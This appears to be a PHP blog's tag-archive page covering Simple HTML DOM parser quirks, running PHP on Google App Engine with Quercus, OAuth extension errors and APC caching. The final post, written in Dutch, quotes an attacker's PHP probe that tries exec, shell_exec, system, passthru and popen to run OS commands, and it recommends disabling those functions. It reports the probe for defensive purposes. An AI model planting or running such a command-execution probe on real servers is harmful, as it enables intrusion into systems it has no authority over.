Tag Archives: php

Simple HTML DOM Parser not that simple

Notwithstanding the name, using PHP Simple HTML DOM Parser isn’t always simple. While working on some issues with WP DoNotTrack‘s SuperClean mode, I encountered these two quirks:

  1. By default Simple HTML DOM removes linebreaks. That means that when you write the modified DOM back to a string for outputting, some (sloppy) JavaScript is bound to break. The solution: pass extra arguments to the DOM-creating functions, as “documented” in the Simple HMTL DOM’s source code. For str_get_html it reads:
    function str_get_html($str, $lowercase=true, $forceTagsClosed=true, $target_charset = DEFAULT_TARGET_CHARSET, $stripRN=true, $defaultBRText=DEFAULT_BR_TEXT)
    

    Set the 5th argument to false to tell the parser not to remove “\r\n”‘s.

  2. Simple HTML DOM is very liberal. It is so liberal, in fact, that it will try to make a DOM out of whatever you throw at it, without even blinking. Until you try to find elements using “find” on the DOM Object, that is, because at that point you might get a “Fatal error: Call to a member function find() on a non-object“-error thrown back at you. You can avoid that nastiness by checking the object for the existence of the find-method and, while you’re at it, also check if there is a HTML-element in the DOM:
    $html = file_get_html('http://url.to/filename.html');
    // first check if $html->find exists
    if (method_exists($html,"find")) {
         // then check if the html element exists to avoid trying to parse non-html
         if ($html->find('html')) {
              // and only then start searching (and manipulating) the dom
         }
    }

So that’s how to put the simple back into PHP Simple HTML DOM Parser. Until the next quirk comes up, because that’s what parsing HTML is all about after all, no?

Some resources about PHP on App Engine

There isn’t a whole lot of documentation about running PHP on Google App Engine to be found, but these links may be helpful (in a “note to self: I should try this when I find the time” kind of way):

If you stumble on these pages because you’re thinking about creating and deploying a PHP application on Google App Engine, you should take into account that although Quercus looks promising, there are bound to be bugs that you’ll sooner or later run into. There are, for example, issues with determining file length and there are problems with variable referencing in some rare/ complex cases. You have been warned! ;-)

Google App Engine project template for PHP (with Quercus)

So you’re a wanna-be developer who’d love to deploy in the cloud, but you only  “know” PHP? Well, as you might already have read elsewhere Caucho, the company behind Resin, has a 100% Java GPL’ed implementation of PHP5 called Quercus that can be used to run PHP on GAE. It took me some time to put the pieces of the puzzle together, but in the end it’s pretty straightforward.

From scratch to a deployed webapp in 7 steps:

  1. Download & install the Google App Engine SDK
  2. Download this GAE project template for PHP and unzip it in the root of the SDK directory as  projects/phptemplate/
  3. Put your PHP-files in projects/phptemplate/war/ (you probably want to overwrite index.php and remove phpinfo.php)
  4. Test you application locally with dev_appserver as described here
  5. Login on https://appengine.google.com/ and register a new application
  6. Put the app id from (5) in projects/phptemplate/war/WEB-INF/appengine-web.xml, between the <application>-tage
  7. Upload your application as described here: appcfg –enable_jar_splitting update <path-to-war> (–enable_jar_splitting is needed as the WEB-INF/lib/resin.jar is rather big)

And there you have it, your very own PHP-app on GAE! Check out the Quercus info on  on how you can access Java components from within you PHP-code, it might come in very handy to use GAE’s Java API’s for the datastore, queues and all those other goodies!

(Disclaimer: while this here template seems to work, I can’t make any promises or provide any kind of warranty.  As soon as you download it, you assume all responsibilities for any problems you might cause to the Internet, GAE or the Ozone-layer.)

PHP OAuth extension: trial, error and success

I’ve been experimenting with the PHP OAuth PECL extension over the last few days and initially ran into some small problems getting it to function correctly. So for the sake of making this world wide web an even better place, here are some error-messages you might encounter and what you could do to resolve them:

  • “OAuth::getRequestToken() URL file-access is disabled in the server configuration” → the OAuth extension by default uses fopen (streams) to fetch data from the OAuth provider (server), but you’re probably slightly paranoid (or is it security- conscious?) and have allow_url_fopen = 0 in you php.ini. Just change that value to “1″ and reload your webserver and then see …
  • SSL: fatal protocol error → OAuth seems to be working fine, but for reasons unknown OAuth insists something fatal just happened. You could ignore this one, or try to lower the error-reporting value or do as I did and decide to use OAuth::setRequestEngine to switch from those doomed streams to almighty Curl, until …
  • “setRequestEngine expects parameter to be long, string given” → so you installed (compiled) the OAuth-extension, but you didn’t have that libcurl-dev package installed, did you? No matter how polite you request that Curl-engine, it is just not going to happen unless you install libcurl-dev, and then re-installed OAuth.

And after successfully re-installing OAuth, this time with Curl-support, you could try to build a small application, accessing GMail maybe?

Fun with caching in PHP with APC (and others)

After installing APC, I looked through the documentation on php.net and noticed 3 interesting functions with regards to session-independent data caching in PHP;

When talking about caching, apc_delete might not be that important, as apc_store allows you to set the TTL (time to live) of the variable you’re storing. If you try to retrieve a stored variable which exceeded the TTL, APC will return FALSE, which tells you to update your cache.

All this means that adding 5 minutes worth of caching to your application could be as simple as doing;

if (($stringValue=apc_fetch($stringKey)) === FALSE) {
$stringValue = yourNormalDogSlowFunctionToGetValue($stringKey);
apc_store($stringKey,$stringValue,300);
}

From a security point-of-view however (esp. on a shared environment) the APC-functions should be considered extremely dangerous. There are no mechanisms to prevent a denial of service; everyone who “does PHP” on a server can fill the APC-cache entirely. Worse yet, using apc_cache_info you can get a list of all keys which you in turn can use to retrieve all associated values, meaning data theft can be an issue as well. But if you’re on a server of your own (and if you trust all php-scripts you install on there), the APC-functions can be sheer bliss!

And off course other opcode caching components such as XCache and eAccelerator offer similar functionality (although it’s disabled by default in eAccelerator because of the security concerns).

Trading eAccelerator for APC

Yesterday I somewhat reluctantly removed eAccelerator from my server (Debian Etch) and installed APC instead. Not because I wasn’t satisfied with performance of eAccelerator, but because the packaged version of it was not in the Debian repositories (Andrew McMillan provided the debs), and those debs weren’t upgraded at the same pace and thus broke my normal upgrade-routine. Moreover APC will apparently become a default part of PHP6 (making the Alternative PHP Cache the default opcode cache component). Installation was as easy as doing “pecl install apc” and adding apc to php.ini. Everything seems to be running as great as it did with eAccelerator (as most test seem to confirm).

PHP security: Eval is evil?

Naar aanleiding van mijn vorige post een beetje naar de tooltjes zitten kijken die de script kiddies op mijn serverken loslaten. Een voorbeeldje:

<?php
echo “549821347819481<br>”;
$cmd=”id”;
$eseguicmd=ex($cmd);
echo $eseguicmd.”<br>”;
function ex($cfe){
$res = ”;
if (!empty($cfe)){
if(function_exists(‘exec’)){
@exec($cfe,$res);
$res = join(“\n”,$res);
}
elseif(function_exists(‘shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(‘system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Met behulp van achtereenvolgens exec, shell_exec, system, passthru en popen proberen ze dus aan command line functies van het (linux/ unix) OS te geraken?

Alzo; bannen die handel, met de ‘disable_functions in php.ini. En als ge daar dan toch weer aan het editeren zijt, voeg ‘eval‘ ook gerust toe, want daarmee wordt extern verkregen code uitgevoerd …

Aanpassen, Apache herstarten en je applicaties testen, want ge weet nooit of één van die functies toch niet absoluut nodig is voor één of ander obscure PHP-applicatie …